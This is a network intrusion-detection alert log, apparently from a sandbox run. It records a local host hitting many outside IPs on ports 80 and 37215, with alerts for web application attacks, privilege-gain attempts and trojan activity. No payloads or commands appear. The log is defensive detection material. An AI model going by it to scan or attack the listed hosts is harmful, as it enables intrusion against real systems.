      Timestamp:192.168.2.2389.41.249.20560208802025883 01/26/24-15:32:44.750284
      SID:2025883
      Source Port:60208
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23125.141.214.17657886802030092 01/26/24-15:31:27.982300
      SID:2030092
      Source Port:57886
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23188.128.228.2952124802030092 01/26/24-15:32:18.599331
      SID:2030092
      Source Port:52124
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23200.51.44.25439076802030092 01/26/24-15:31:23.573871
      SID:2030092
      Source Port:39076
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.244.93.14353710802025883 01/26/24-15:31:55.700501
      SID:2025883
      Source Port:53710
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.241.121.355228372152829579 01/26/24-15:31:35.990854
      SID:2829579
      Source Port:55228
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2323.58.241.8340892802030092 01/26/24-15:32:25.540390
      SID:2030092
      Source Port:40892
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2345.135.232.545120802025883 01/26/24-15:31:13.845208
      SID:2025883
      Source Port:45120
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2320.93.126.9855832802025883 01/26/24-15:33:00.496099
      SID:2025883
      Source Port:55832
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23151.205.173.3258482802030092 01/26/24-15:32:47.726111
      SID:2030092
      Source Port:58482
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23109.104.144.9857384802030092 01/26/24-15:31:52.901761
      SID:2030092
      Source Port:57384
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23183.255.117.4441112802030092 01/26/24-15:32:40.101073
      SID:2030092
      Source Port:41112
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23172.121.187.15151508802030092 01/26/24-15:32:47.613814
      SID:2030092
      Source Port:51508
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2351.222.111.20141192802025883 01/26/24-15:31:23.456384
      SID:2025883
      Source Port:41192
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.77.134.8238044372152835222 01/26/24-15:31:52.879041
      SID:2835222
      Source Port:38044
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23143.204.96.6033308802025883 01/26/24-15:32:18.732902
      SID:2025883
      Source Port:33308
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.201.134.2259708802030092 01/26/24-15:32:30.795973
      SID:2030092
      Source Port:59708
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23188.51.163.7635892802030092 01/26/24-15:31:12.594146
      SID:2030092
      Source Port:35892
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23133.223.33.19153554802025883 01/26/24-15:32:25.532569
      SID:2025883
      Source Port:53554
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2318.164.249.7846800802030092 01/26/24-15:31:01.375993
      SID:2030092
      Source Port:46800
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2391.220.229.24957652802030092 01/26/24-15:31:44.826702
      SID:2030092
      Source Port:57652
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2347.246.10.10051612802030092 01/26/24-15:32:19.110765
      SID:2030092
      Source Port:51612
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.24.90.8534596802030092 01/26/24-15:32:25.541697
      SID:2030092
      Source Port:34596
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.201.56.17747892802025883 01/26/24-15:33:01.783768
      SID:2025883
      Source Port:47892
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2334.199.210.5146056802030092 01/26/24-15:31:23.425405
      SID:2030092
      Source Port:46056
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23116.62.71.21539852802030092 01/26/24-15:32:01.559265
      SID:2030092
      Source Port:39852
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23178.16.125.7852530802025883 01/26/24-15:31:26.836533
      SID:2025883
      Source Port:52530
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23198.1.91.2538456802030092 01/26/24-15:32:06.600510
      SID:2030092
      Source Port:38456
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23128.199.1.7957134802030092 01/26/24-15:32:44.664038
      SID:2030092
      Source Port:57134
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2350.118.154.12242678802025883 01/26/24-15:32:56.776146
      SID:2025883
      Source Port:42678
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23167.114.61.3959674802030092 01/26/24-15:31:12.402679
      SID:2030092
      Source Port:59674
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2335.247.250.10957112802030092 01/26/24-15:31:01.808664
      SID:2030092
      Source Port:57112
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23194.53.176.10136592802025883 01/26/24-15:32:25.792214
      SID:2025883
      Source Port:36592
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2313.249.180.19955930802025883 01/26/24-15:31:30.559266
      SID:2025883
      Source Port:55930
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23162.155.183.19344666802030092 01/26/24-15:32:11.781834
      SID:2030092
      Source Port:44666
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23130.254.45.11260120802025883 01/26/24-15:31:41.456093
      SID:2025883
      Source Port:60120
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23188.128.228.2952124802025883 01/26/24-15:32:18.599331
      SID:2025883
      Source Port:52124
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2341.89.94.8436374802025883 01/26/24-15:32:34.782595
      SID:2025883
      Source Port:36374
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23187.192.184.22845648802025883 01/26/24-15:32:06.859488
      SID:2025883
      Source Port:45648
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2313.91.138.12738430802030092 01/26/24-15:31:49.499486
      SID:2030092
      Source Port:38430
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2350.228.145.13334136802030092 01/26/24-15:32:35.806433
      SID:2030092
      Source Port:34136
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2351.222.111.20141192802030092 01/26/24-15:31:23.456384
      SID:2030092
      Source Port:41192
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23122.116.234.20733582802025883 01/26/24-15:31:51.956820
      SID:2025883
      Source Port:33582
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.235.23.53.20254988802030092 01/26/24-15:31:58.910288
      SID:2030092
      Source Port:54988
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23211.149.134.21350172802025883 01/26/24-15:32:13.187329
      SID:2025883
      Source Port:50172
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23217.92.132.15052322802030092 01/26/24-15:31:37.944780
      SID:2030092
      Source Port:52322
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23184.24.189.6247104802025883 01/26/24-15:31:37.924300
      SID:2025883
      Source Port:47104
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23185.133.20.854662802030092 01/26/24-15:32:19.590376
      SID:2030092
      Source Port:54662
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23191.101.131.2144710802025883 01/26/24-15:31:49.579489
      SID:2025883
      Source Port:44710
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.77.235.19258712802025883 01/26/24-15:31:41.620325
      SID:2025883
      Source Port:58712
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23164.42.149.25243066802025883 01/26/24-15:32:14.712104
      SID:2025883
      Source Port:43066
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23221.194.131.8758524802030092 01/26/24-15:31:41.925411
      SID:2030092
      Source Port:58524
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23163.5.192.9652060802030092 01/26/24-15:32:41.706916
      SID:2030092
      Source Port:52060
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.254.87.6340596372152835222 01/26/24-15:32:52.520635
      SID:2835222
      Source Port:40596
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23188.51.163.7635892802025883 01/26/24-15:31:12.594146
      SID:2025883
      Source Port:35892
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2374.208.140.12337336802030092 01/26/24-15:32:11.570526
      SID:2030092
      Source Port:37336
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2341.44.41.6749362372152829579 01/26/24-15:31:52.468921
      SID:2829579
      Source Port:49362
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23209.206.59.8743802802030092 01/26/24-15:32:18.540220
      SID:2030092
      Source Port:43802
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23149.12.212.5233460802025883 01/26/24-15:31:35.603929
      SID:2025883
      Source Port:33460
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2334.96.71.2541004802030092 01/26/24-15:32:39.548469
      SID:2030092
      Source Port:41004
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.192.184.1243988802030092 01/26/24-15:31:55.842282
      SID:2030092
      Source Port:43988
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23217.73.134.19745198802030092 01/26/24-15:31:04.288934
      SID:2030092
      Source Port:45198
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2393.179.30.21356902802025883 01/26/24-15:32:15.908806
      SID:2025883
      Source Port:56902
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2347.100.202.11756470802030092 01/26/24-15:32:45.243255
      SID:2030092
      Source Port:56470
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2354.201.62.19056696802025883 01/26/24-15:31:23.776945
      SID:2025883
      Source Port:56696
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.17.247.18641598802025883 01/26/24-15:32:11.557512
      SID:2025883
      Source Port:41598
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23103.67.246.15955592802025883 01/26/24-15:32:11.805602
      SID:2025883
      Source Port:55592
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2395.216.144.14242362802030092 01/26/24-15:32:39.873221
      SID:2030092
      Source Port:42362
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23211.25.120.21259646802025883 01/26/24-15:33:01.663963
      SID:2025883
      Source Port:59646
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2334.66.136.20042328802025883 01/26/24-15:31:23.711502
      SID:2025883
      Source Port:42328
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2374.57.213.2047822802030092 01/26/24-15:32:25.423381
      SID:2030092
      Source Port:47822
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23173.232.181.21650596802025883 01/26/24-15:32:11.559221
      SID:2025883
      Source Port:50596
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.49.33.2453916802025883 01/26/24-15:31:30.578429
      SID:2025883
      Source Port:53916
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.238.217.167.1952856802030092 01/26/24-15:32:04.936288
      SID:2030092
      Source Port:52856
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2351.89.136.11539608802025883 01/26/24-15:32:18.378722
      SID:2025883
      Source Port:39608
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23111.51.104.23142972802025883 01/26/24-15:32:25.692850
      SID:2025883
      Source Port:42972
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23108.156.62.15748266802030092 01/26/24-15:31:04.249083
      SID:2030092
      Source Port:48266
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23208.106.233.17852066802025883 01/26/24-15:31:47.689173
      SID:2025883
      Source Port:52066
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23152.0.245.2048074802030092 01/26/24-15:32:50.653183
      SID:2030092
      Source Port:48074
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23121.189.159.847844802025883 01/26/24-15:31:27.210827
      SID:2025883
      Source Port:47844
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23120.53.232.13745462802030092 01/26/24-15:32:20.034063
      SID:2030092
      Source Port:45462
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2334.128.166.8250578802030092 01/26/24-15:32:25.383055
      SID:2030092
      Source Port:50578
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2365.110.67.446906802030092 01/26/24-15:31:49.655535
      SID:2030092
      Source Port:46906
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23184.94.157.20458528802025883 01/26/24-15:32:30.542967
      SID:2025883
      Source Port:58528
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2379.129.85.4050426802025883 01/26/24-15:32:53.836183
      SID:2025883
      Source Port:50426
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2360.43.214.23137832802025883 01/26/24-15:31:51.435831
      SID:2025883
      Source Port:37832
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2318.194.17.17646016802025883 01/26/24-15:31:41.778567
      SID:2025883
      Source Port:46016
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23106.75.143.13134368802025883 01/26/24-15:32:50.178295
      SID:2025883
      Source Port:34368
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23195.87.80.16555956802025883 01/26/24-15:31:44.820074
      SID:2025883
      Source Port:55956
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23196.205.27.22641806802030092 01/26/24-15:32:04.941163
      SID:2030092
      Source Port:41806
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23197.246.107.15135100372152835222 01/26/24-15:32:53.792661
      SID:2835222
      Source Port:35100
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23103.21.224.21237054802025883 01/26/24-15:32:07.991335
      SID:2025883
      Source Port:37054
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23182.23.12.2637814802030092 01/26/24-15:32:19.158178
      SID:2030092
      Source Port:37814
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23119.3.220.6855482802025883 01/26/24-15:32:38.736141
      SID:2025883
      Source Port:55482
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2372.21.26.10841576802025883 01/26/24-15:33:00.470464
      SID:2025883
      Source Port:41576
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23108.157.169.2641948802030092 01/26/24-15:31:01.192186
      SID:2030092
      Source Port:41948
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23201.0.234.4241126802025883 01/26/24-15:31:33.229715
      SID:2025883
      Source Port:41126
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2350.19.0.15341852802030092 01/26/24-15:32:35.511583
      SID:2030092
      Source Port:41852
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23201.28.145.11459922802030092 01/26/24-15:31:26.850722
      SID:2030092
      Source Port:59922
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.241.113.2943492372152835222 01/26/24-15:31:35.972751
      SID:2835222
      Source Port:43492
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23173.29.24.18733044802025883 01/26/24-15:31:43.748280
      SID:2025883
      Source Port:33044
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23119.207.31.17746712802025883 01/26/24-15:31:41.495556
      SID:2025883
      Source Port:46712
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2352.87.15.13548334802030092 01/26/24-15:32:19.584226
      SID:2030092
      Source Port:48334
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23197.246.45.20139758372152835222 01/26/24-15:32:04.352629
      SID:2835222
      Source Port:39758
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23184.51.99.17551534802025883 01/26/24-15:32:37.067103
      SID:2025883
      Source Port:51534
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23108.138.167.14446376802025883 01/26/24-15:31:23.425510
      SID:2025883
      Source Port:46376
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2338.47.144.16346026802030092 01/26/24-15:31:52.998716
      SID:2030092
      Source Port:46026
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2318.66.222.15547870802030092 01/26/24-15:31:41.789331
      SID:2030092
      Source Port:47870
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.79.19.10349378802025883 01/26/24-15:31:26.735340
      SID:2025883
      Source Port:49378
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2313.239.176.6832990802025883 01/26/24-15:31:49.632193
      SID:2025883
      Source Port:32990
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2377.79.225.8552098802030092 01/26/24-15:32:53.764720
      SID:2030092
      Source Port:52098
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23103.123.4.8037724802030092 01/26/24-15:31:20.789732
      SID:2030092
      Source Port:37724
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23138.3.212.12138624802025883 01/26/24-15:32:23.948314
      SID:2025883
      Source Port:38624
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23138.4.254.15859294802030092 01/26/24-15:32:04.618046
      SID:2030092
      Source Port:59294
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.62.79.23948618802025883 01/26/24-15:32:07.603043
      SID:2025883
      Source Port:48618
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23149.28.12.20146238802025883 01/26/24-15:32:41.674136
      SID:2025883
      Source Port:46238
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23198.46.203.3945072802025883 01/26/24-15:32:47.575690
      SID:2025883
      Source Port:45072
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2383.167.179.936342802030092 01/26/24-15:32:32.574465
      SID:2030092
      Source Port:36342
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.77.139.5636632372152835222 01/26/24-15:32:52.336505
      SID:2835222
      Source Port:36632
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2335.183.233.14441518802025883 01/26/24-15:32:21.506383
      SID:2025883
      Source Port:41518
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2334.110.219.24053370802030092 01/26/24-15:31:35.621311
      SID:2030092
      Source Port:53370
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23192.185.224.21638158802030092 01/26/24-15:31:30.592293
      SID:2030092
      Source Port:38158
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2318.169.247.8253346802030092 01/26/24-15:31:33.204599
      SID:2030092
      Source Port:53346
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23192.169.179.3658894802025883 01/26/24-15:31:27.638300
      SID:2025883
      Source Port:58894
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2338.53.37.23046536802030092 01/26/24-15:32:47.324847
      SID:2030092
      Source Port:46536
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23160.124.107.20050914802025883 01/26/24-15:32:58.726118
      SID:2025883
      Source Port:50914
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23154.95.217.17434028802025883 01/26/24-15:32:19.891483
      SID:2025883
      Source Port:34028
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23100.40.152.3447214802025883 01/26/24-15:31:26.761872
      SID:2025883
      Source Port:47214
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2393.184.250.233602802025883 01/26/24-15:32:56.621551
      SID:2025883
      Source Port:33602
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2381.198.251.19750352802025883 01/26/24-15:32:06.972423
      SID:2025883
      Source Port:50352
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2318.235.53.6041494802030092 01/26/24-15:32:06.564301
      SID:2030092
      Source Port:41494
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.116.119.10733370802025883 01/26/24-15:32:18.744839
      SID:2025883
      Source Port:33370
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.232.17.206.8348860802030092 01/26/24-15:32:40.082111
      SID:2030092
      Source Port:48860
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2366.45.251.8637802802030092 01/26/24-15:31:36.579696
      SID:2030092
      Source Port:37802
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23178.128.201.21958508802025883 01/26/24-15:32:47.668263
      SID:2025883
      Source Port:58508
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.232.37.191.14334212802030092 01/26/24-15:32:33.834444
      SID:2030092
      Source Port:34212
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2366.228.50.1543950802025883 01/26/24-15:31:33.008718
      SID:2025883
      Source Port:43950
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2365.1.219.12134742802030092 01/26/24-15:32:31.046646
      SID:2030092
      Source Port:34742
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23171.236.63.23344144802025883 01/26/24-15:31:16.333458
      SID:2025883
      Source Port:44144
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23162.14.101.3338388802030092 01/26/24-15:31:26.997595
      SID:2030092
      Source Port:38388
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2388.157.120.5760410802025883 01/26/24-15:32:23.859066
      SID:2025883
      Source Port:60410
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23213.29.44.22540388802030092 01/26/24-15:32:25.756351
      SID:2030092
      Source Port:40388
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2345.143.98.8452284802030092 01/26/24-15:31:54.084287
      SID:2030092
      Source Port:52284
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23151.244.61.7554984802030092 01/26/24-15:32:41.876739
      SID:2030092
      Source Port:54984
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2320.253.71.232906802030092 01/26/24-15:32:49.944359
      SID:2030092
      Source Port:32906
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23185.232.128.13349740802025883 01/26/24-15:32:01.702135
      SID:2025883
      Source Port:49740
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2354.79.81.18745534802030092 01/26/24-15:31:44.904507
      SID:2030092
      Source Port:45534
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23197.246.45.20139958372152829579 01/26/24-15:32:11.998768
      SID:2829579
      Source Port:39958
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2313.55.166.21340060802025883 01/26/24-15:32:35.983520
      SID:2025883
      Source Port:40060
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2396.16.22.25458896802030092 01/26/24-15:33:00.563016
      SID:2030092
      Source Port:58896
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23210.243.112.15758784802025883 01/26/24-15:31:51.438281
      SID:2025883
      Source Port:58784
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2354.243.167.15060322802025883 01/26/24-15:32:15.823027
      SID:2025883
      Source Port:60322
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23172.66.135.15451118802030092 01/26/24-15:32:14.830379
      SID:2030092
      Source Port:51118
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.68.14.17548588802025883 01/26/24-15:32:21.661776
      SID:2025883
      Source Port:48588
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.90.119.1242320802025883 01/26/24-15:32:25.639118
      SID:2025883
      Source Port:42320
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2320.241.66.6740198802025883 01/26/24-15:32:15.705873
      SID:2025883
      Source Port:40198
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
